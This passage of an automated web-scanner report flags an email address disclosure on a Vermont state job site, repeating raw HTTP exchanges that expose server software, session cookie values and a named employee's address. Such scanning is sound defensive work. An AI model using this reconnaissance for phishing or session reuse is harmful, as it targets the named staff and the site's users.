CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:07:33'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:03 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:03'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 301 Moved Permanently Content-Length: 158 Content-Type: text/html Location: https://www.vermontjoblink.com/ada/ Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:15:04 GMT Connection: close
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://www.vermontjoblink.com/ada/">here</a></body>
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/ HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:06:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Set-Cookie: TEST=1;path=/
Set-Cookie: SYSTRANLANGUAGE=en;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/404/404_qry.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:01 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email addresses were disclosed in the response:
joseph.lucia@state.vt.us
vjl@state.vt.us
Request
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:52 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <a href="mailto:vjl@state.vt.us">vjl@state.vt.us</a> ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/customization/Vermont/favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:06:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/404/404_qry.cfm
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/customization/Vermont/images/1p.gif HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK
Content-Length: 49
Content-Type: image/gif
Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/1p.gif
Last-Modified: Fri, 22 Oct 2010 17:19:52 GMT
Accept-Ranges: bytes
ETag: "8db9756d72cb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:55 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/customization/Vermont/images/crop_hump2.jpg HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK
Content-Length: 51151
Content-Type: image/jpeg
Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/crop_hump2.jpg
Last-Modified: Fri, 22 Oct 2010 17:20:03 GMT
Accept-Ranges: bytes
ETag: "3c172b5dd72cb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:55 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/customization/Vermont/images/statebullet.png HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK
Content-Length: 5822
Content-Type: image/png
Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/statebullet.png
Last-Modified: Fri, 22 Oct 2010 17:20:26 GMT
Accept-Ranges: bytes
ETag: "a8fd16bd72cb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:55 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/customization/Vermont/images/vt_logo.gif HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK
Content-Length: 2903
Content-Type: image/gif
Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/vt_logo.gif
Last-Modified: Fri, 22 Oct 2010 17:20:33 GMT
Accept-Ranges: bytes
ETag: "827d306fd72cb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
